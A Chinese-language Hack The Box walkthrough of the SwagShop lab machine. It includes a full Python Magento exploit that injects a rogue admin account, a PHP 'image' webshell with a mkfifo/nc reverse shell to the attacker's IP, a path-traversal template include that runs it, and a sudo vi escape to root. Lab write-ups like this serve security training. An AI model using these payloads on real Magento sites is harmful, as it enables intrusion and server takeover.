Hackthebox - SwagShop

靶场信息

靶场类型

信息收集

Nmap

┌──(root㉿kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 10000 10.10.10.140
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-17 02:26 CST
Warning: 10.10.10.140 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.140
Host is up (0.078s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6552bd24e8fa3817261379a12f624ec (RSA)
|   256 2e30007a92f0893059c17756ad51c0ba (ECDSA)
|_  256 4c50d5f270c5fdc4b2f0bc4220326434 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Did not follow redirect to http://swagshop.htb/
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=2/17%OT=22%CT=1%CU=30863%PV=Y%DS=2%DC=T%G=Y%TM=63EE758
OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M537ST11NW7%O2=M537ST11NW7%O3=M537NNT11NW7%O4=M537ST11NW7%O5=M537ST1
OS:1NW7%O6=M537ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M537NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 993/tcp)
HOP RTT       ADDRESS
1   117.05 ms 10.10.16.1
2   76.51 ms  10.10.10.140

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.68 seconds

Http

这边 http 会跳转到域名 swagshop.htb ,去加入一个 hosts 解析

echo 10.10.10.140 swagshop.htb >> /etc/hosts

似乎是一个商城,底部可以发现这是 2014 年版本的 Magento

去搜索一下是否有漏洞

┌──(root㉿kali)-[~/Desktop]
└─# searchsploit magento      
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                   |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection                                                                                                                     | php/webapps/38573.txt
eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Service)                                                                                          | php/webapps/38651.txt
Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Username']' Cross-Site Scripting                                                                               | php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController.php?email' Cross-Site Scripting                                                                         | php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' Cross-Site Scripting                                                                                                                        | php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File                                                                                                                   | php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution                                                                                                                     | php/webapps/37811.py
Magento eCommerce - Local File Disclosure                                                                                                                                        | php/webapps/19793.txt
Magento eCommerce - Remote Code Execution                                                                                                                                        | xml/webapps/37977.py
Magento eCommerce CE v2.3.5-p2 - Blind SQLi                                                                                                                                      | php/webapps/50896.txt
Magento Server MAGMI Plugin - Multiple Vulnerabilities                                                                                                                           | php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion                                                                                                                      | php/webapps/35052.txt
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass                                                                                                     | php/webapps/48135.php
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

这边发现有一个 RCE 的漏洞

漏洞利用

拷贝到本地后去查看一下

import requests
import base64
import sys

target = "http://target.com/"

if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

target_url = target + "/admin/Cms_Wysiwyg/directive/index/"

q="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""


query = q.replace("\n", "").format(username="forme", password="forme")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url,
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds forme:forme".format(target)
else:
    print "DID NOT WORK"
import requests
import base64
import sys

target = "http://swagshop.htb/index.php"

if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

target_url = target + "/admin/Cms_Wysiwyg/directive/index/"

q="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""


query = q.replace("\n", "").format(username="lucifiel", password="lucifiel")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url,
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds lucifiel:lucifiel".format(target)
else:
    print "DID NOT WORK"

根据我们需要的进行修改,将第五行的地址更改为 http://swagshop.htb/index.php ,将第二十四行的账号密码更改为我们需要的账号密码

┌──(root㉿kali)-[~/Desktop]
└─# python2 exploit.py
WORKED
Check http://swagshop.htb/index.php/admin with creds lucifiel:lucifiel

然后去进行登录

成功登录

https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper

通过翻找,找到了一篇漏洞相关的文档

这里依次点击 System –> Configuration –> Advanced –> Developer –> Template Settings –> Allow Symlinks

然后将它设置为 yes,然后点击 save config 保存

接着制作图片马

echo '<?php' >> shell.php.png
echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4444 >/tmp/f");'>> shell.php.png
echo '?>' >> shell.php.png

然后再依次点击 Catalog -> Manager Categories 进行上传

然后去查看,会发现我们的图片已经传上去了

最后一步是创建通讯模板兵注入我们的 payload

点击 Newsletter -> Newsletter Templates -> Add New Template

{{block type='core/template' template='../../../../../../media/catalog/category/shell.php.png'}}

这是我们要填入的内容

然后使用 nc 监听一个端口

最后我们点击 Preview Template 预览模板

┌──(root㉿kali)-[~/Desktop]
└─# rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.140] 33206
/bin/sh: 0: can't access tty; job control turned off
$ whoami&&id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

得到了一个 shell

python3 -c "import pty;pty.spawn('/bin/bash')";

权限提升

$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

我们可以使用 root 权限调用 /sur/bin/vi 执行所有 /var/www/html/* 的文件

$ ls -la /var/www/html/
total 720
drwxr-xr-x 12 www-data www-data   4096 Nov 12  2021 .
drwxr-xr-x  3 root     root       4096 Nov 12  2021 ..
-rw-r--r--  1 www-data www-data   5667 May  7  2014 .htaccess
-rw-r--r--  1 www-data www-data   4568 May  7  2014 .htaccess.sample
-rw-r--r--  1 www-data www-data  10679 May  7  2014 LICENSE.html
-rw-r--r--  1 www-data www-data  10410 May  7  2014 LICENSE.txt
-rw-r--r--  1 www-data www-data  10421 May  7  2014 LICENSE_AFL.txt
-rw-r--r--  1 www-data www-data 585086 May  7  2014 RELEASE_NOTES.txt
-rw-r--r--  1 www-data www-data   2834 May  7  2014 api.php
drwxr-xr-x  6 www-data www-data   4096 Nov 12  2021 app
-rw-r--r--  1 www-data www-data   2831 May  7  2014 cron.php
-rw-r--r--  1 www-data www-data    717 May  7  2014 cron.sh
drwxr-xr-x  3 www-data www-data   4096 Nov 12  2021 errors
-rw-r--r--  1 www-data www-data   1150 May  7  2014 favicon.ico
-rw-r--r--  1 www-data www-data   5979 May  7  2014 get.php
drwxr-xr-x  2 www-data www-data   4096 Nov 12  2021 includes
-rw-r--r--  1 www-data www-data   2642 May  7  2014 index.php
-rw-r--r--  1 www-data www-data   2366 May  7  2014 index.php.sample
-rw-r--r--  1 www-data www-data   6441 May  7  2014 install.php
drwxr-xr-x 12 www-data www-data   4096 Nov 12  2021 js
drwxr-xr-x 13 www-data www-data   4096 Nov 12  2021 lib
-rw-r--r--  1 www-data www-data   1319 May  7  2014 mage
drwxrwxrwx  8 www-data www-data   4096 Nov 12  2021 media
-rw-r--r--  1 www-data www-data    886 May  7  2014 php.ini.sample
drwxr-xr-x  2 www-data www-data   4096 Nov 12  2021 pkginfo
drwxr-xr-x  2 www-data www-data   4096 Nov 12  2021 shell
drwxr-xr-x  5 www-data www-data   4096 Nov 12  2021 skin
drwxr-xr-x 10 www-data www-data   4096 Feb 16 13:54 var

我们可以看到,/var/www/html/ 目录下的东西还是挺多的

https://gtfobins.github.io/gtfobins/vi/

根据 GTFOBins 上的提示,我们在 vi 编辑中,使用 :shell 即可获得权限

那我们去随便执行一个吧

sudo /usr/bin/vi /var/www/html/index.php

执行后按 ESC,然后输入 :shell 即可

root@swagshop:/var/www/html# whoami&&id
whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)

成功提权到 root 权限

root@swagshop:/var/www/html# cat /home/haris/user.txt
cat /home/haris/user.txt
370cc7d01561ab4da02e53de7ef8d799

成功拿到 user 权限的 flag 文件

root@swagshop:/var/www/html# cat /root/root.txt
cat /root/root.txt
295e684ef53b47af9e6fc69a3301ee26

成功拿到 root 权限的 flag 文件